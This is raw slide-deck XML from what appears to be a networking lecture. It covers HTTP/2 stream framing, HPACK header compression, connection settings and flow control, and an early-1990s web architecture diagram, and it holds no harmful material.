          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4553620" y="4902087"/>
            <a:ext cx="739475" cy="118799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t>DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ID: 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Rectangle 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6540BA7E-4CC1-9C19-FF5B-C1CCC39B9EFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5362623" y="4902087"/>
            <a:ext cx="739475" cy="118799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t>DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ID: 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Rectangle 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A90AA6D4-81D7-B43D-383A-27442F650BB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6171626" y="4902087"/>
            <a:ext cx="739475" cy="118799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t>DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ID: 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Rectangle 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BE4C1A-1815-9C60-17D5-454510589EF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6980629" y="4897076"/>
            <a:ext cx="1030082" cy="118799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t>HEADER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ID: 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Rectangle 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0E7DB00-E50F-816F-2166-ABC9FEF5CB02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8080239" y="4895376"/>
            <a:ext cx="739475" cy="118799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t>DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ID: 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Rectangle 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F45AB29-469A-DCBF-030E-38ACC824620A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8889244" y="4895376"/>
            <a:ext cx="739475" cy="118799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t>DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ID: 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344944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right)">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="40"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="25" presetID="22" presetClass="entr" presetSubtype="2"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="61"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="28" presetID="22" presetClass="entr" presetSubtype="2"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="31" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="32" presetID="2" presetClass="entr" presetSubtype="2"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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>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 presetClass="entr" presetSubtype="2"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1+#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2" presetClass="entr" presetSubtype="2"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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44"/>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2" presetClass="entr" presetSubtype="2"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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="50" dur="50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2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="52" presetID="2" presetClass="entr" presetSubtype="2"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additive="base">
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="56" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="57" presetID="2" presetClass="entr" presetSubtype="2"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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="60" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="61" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="62" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="57"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="64" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="65" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="66" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="67" presetID="2" presetClass="entr" presetSubtype="2"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additive="base">
                                        <p:cTn id="69" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="70"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56" grpId="0" animBg="1"/>
      <p:bldP spid="57" grpId="0" animBg="1"/>
      <p:bldP spid="5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0C9741-3C4D-304B-5925-E2C578D2575B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wire Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16482D6F-71F2-66FA-7214-F9B7EF69FC41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{283B9EA5-CE9A-4950-A80C-5ADF06B45BB8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B4B6EB9-89A1-893F-751A-78D67ECBC48E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP 1.1: text encoded headers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> compression of data (not headers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP 2 headers are binary encoded, not text encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HPACK compression by default of headers and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static dictionary of super common strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“cookie:”, “accept-encoding:”, “:path: /”, “:method: GET”, “:scheme: https”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic dictionary of common strings across a given connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“accept-encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, deflate, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sdch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”, “accept-language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en-US,en;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=0.8”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Huffman encode everything else</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28830431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58BB-1AAF-E212-4C58-1E85EE0BA751}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lots More to HTTP 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2565AEF0-52BA-3461-CACB-B4BDA40B07DF}"/>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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1098E64F-879A-5E47-C043-87767DFADB87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection Settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Size of the HPACK compression tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initial window size? How many concurrent requests? Max frame size?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prioritization and Flow control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some requests are more important than others, need to signal priority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heavy streams should not starve small streams of bandwidth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server push</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… HTTP 2 is complicated!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27828238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Evolution of HTTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828801" y="2743200"/>
            <a:ext cx="9497484" cy="2672522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>HTTP 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3238697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Architecture circa-1992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5028" y="2606282"/>
            <a:ext cx="893446" cy="893446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400049" y="1838236"/>
            <a:ext cx="5527191" cy="4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Client Side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869" y="2606282"/>
            <a:ext cx="971550" cy="971550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8538210" y="1839028"/>
            <a:ext cx="3356610" cy="4608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t>Server Side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6037338" y="1838236"/>
            <a:ext cx="2390775" cy="461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t>Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6592165" y="4151826"/>
            <a:ext cx="1281120" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Gopher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291464" y="3838489"/>
            <a:ext cx="1411605" cy="2011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Document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Renderer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2564245" y="3838489"/>
            <a:ext cx="1805940" cy="52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HTML Parser</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5028" y="4322355"/>
            <a:ext cx="1043939" cy="1043939"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4849637" y="4653267"/>
            <a:ext cx="2264913" cy="38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Network Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7405753" y="4653267"/>
            <a:ext cx="2264913" cy="382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Network Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4370185" y="4098686"/>
            <a:ext cx="1420850"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55275" y="3711869"/>
            <a:ext cx="744114" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
